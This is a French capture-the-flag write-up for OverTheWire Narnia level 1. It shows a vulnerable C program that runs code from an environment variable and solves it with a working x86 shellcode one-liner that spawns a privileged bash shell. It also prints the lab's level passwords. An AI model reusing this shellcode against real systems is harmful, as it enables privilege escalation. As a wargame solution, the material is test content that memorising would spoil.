====== Level 1 ======

<code>
ssh narnia1@narnia.labs.overthewire.org
pass : efeidiedae
</code>

<code C>
#include <stdio.h>

int main(){
	int (*ret)();

	if(getenv("EGG")==NULL){    
		printf("Give me something to execute at the env-variable EGG\n");
		exit(1);
	}

	printf("Trying to execute EGG!\n");
	ret = getenv("EGG");
	ret();

	return 0;
}
</code>

Le programme exécute le code présent dans la variable d’environnement ''EGG'', nous allons donc mettre notre shellcode dedans.

<code>
narnia1@melissa:/narnia$ export EGG=$(python -c 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"')
narnia1@melissa:/narnia$ ./narnia1
Trying to execute EGG!
bash-4.2$ id
uid=14001(narnia1) gid=14001(narnia1) euid=14002(narnia2) groups=14002(narnia2),14001(narnia1)
bash-4.2$ cat /etc/narnia_pass/narnia2
nairiepecu
</code>